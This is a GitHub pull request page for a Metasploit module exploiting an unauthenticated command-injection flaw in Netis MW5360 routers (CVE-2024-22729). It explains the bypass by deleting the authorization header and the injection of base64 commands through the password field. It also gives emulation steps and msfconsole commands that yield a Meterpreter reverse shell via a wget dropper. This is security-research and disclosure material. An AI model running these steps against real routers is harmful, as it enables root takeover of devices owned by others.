-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Netis MW5360 unauthenticated RCE [CVE-2024-22729] #19188
base: master
Are you sure you want to change the base?
Conversation
Dear Reviewers, |
Did some extensive testing with other Netis router models and firmware versions. So I propose land this one, because it has been disclosed and the chain of attack is different from what I found from my other research. I will submit another module after I have informed the vendor and followed the policy of disclosure. |
Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
The vulnerability stems from improper handling of the
password
parameter within the router's web interface.The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to
V1.0.1.3442
are vulnerable.Attackers can inject a command in the
password
parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take full control of the router as userroot
.The following Netis network products are vulnerable:
This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
Installation steps to emulate the router firmware with FirmAE
FirmAE
on your Linux distribution using the installation instructions provided here.binwalk
might need to be able to handle a sasquatch filesystem which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after yourFirmAE
installation otherwise you will not be able to extract the firmware.MW5360-1.0.1.3442.bin
for the demonstration../init.sh
to initialize and start the Postgress database../run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin
ping
the emulated router and runnmap
to check the portsYou are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
Verification
msfconsole
use exploit/linux/http/netis_unauth_rce_cve_2024_22729
set rhosts <ip-target>
set lhost <ip-attacker>
set target <0=Linux Dropper>
exploit
you should get a
Meterpreter
session.Scenarios
Netis MW5360 Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations
Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
Another limitation is that the router has a very limited command set that can be leveraged, so the only option is to use the
wget
command to drop an executable on the target to get a session. Chained command lines using;
do not work, so each command need to be executed in a separate request with delay of 30 seconds of more to avoid session locking (see theCMD_DELAY
option).Last but not least, be mindful that the admin router password gets overwritten by the exploit, resulting in a clear indicator of comprise.